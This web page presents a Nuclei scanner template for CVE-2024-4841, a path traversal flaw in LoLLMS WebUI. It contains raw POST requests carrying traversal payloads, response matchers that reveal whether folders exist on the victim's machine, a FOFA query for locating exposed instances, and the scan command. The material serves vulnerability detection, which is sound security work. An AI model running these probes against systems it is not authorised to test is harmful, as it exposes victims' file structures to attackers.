Skip to content
Nuclei Templates

LoLLMS WebUI - Subfolder Prediction via Path Traversal

ID: CVE-2024-4841

Severity: medium

Author: s4e-io

Tags: cve,cve2024,lollms-webui,traversal

Description

Section titled “Description”

A Path Traversal vulnerability exists in the parisneo/lollms-webui, specifically within the ‘add_reference_to_local_mode’ function due to the lack of input sanitization. This vulnerability affects versions v9.6 to the latest.

YAML Source

Section titled “YAML Source”
id: CVE-2024-4841


info:
  name: LoLLMS WebUI - Subfolder Prediction via Path Traversal
  author: s4e-io
  severity: medium
  description: |
    A Path Traversal vulnerability exists in the parisneo/lollms-webui, specifically within the 'add_reference_to_local_mode' function due to the lack of input sanitization. This vulnerability affects versions v9.6 to the latest.
  impact: |
    By exploiting this vulnerability, an attacker can predict the folders, subfolders, and files present on the victim's computer. The vulnerability is present in the way the application handles the 'path' parameter in HTTP requests to the '/add_reference_to_local_model' endpoint.
  reference:
    - https://huntr.com/bounties/740dda3e-7104-4ccf-9ac4-8870e4d6d602
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4841
  classification:
    cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4
    cve-id: CVE-2024-4841
    cwe-id: CWE-29
    epss-score: 0.00043
    epss-percentile: 0.09834
  metadata:
    max-request: 1
    fofa-query: "LoLLMS WebUI - Welcome"
  tags: cve,cve2024,lollms-webui,traversal


variables:
  folder: "{{to_upper(rand_text_alpha(10))}}"


flow: http(1) && http(2)


http:
  - raw:
      - |
        POST /add_reference_to_local_model HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        {"path":"\\Users"}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{\"status\":true}")'
          - 'contains(content_type,"application/json")'
          - 'status_code == 200'
        condition: and


  - raw:
      - |
        POST /add_reference_to_local_model HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        {"path":"\\{{folder}}"}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{\"status\":false,\"error\":\"Model not found\"}")'
          - 'contains(content_type,"application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502201a235ac0919234ac794bfbc1ab77c89c545aed64aad306998a8c931ab461fd76022100842682677480c9af418a793119be1fdee127f52624333701b7e8bca4fdcaa55a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-4841.yaml"

View on Github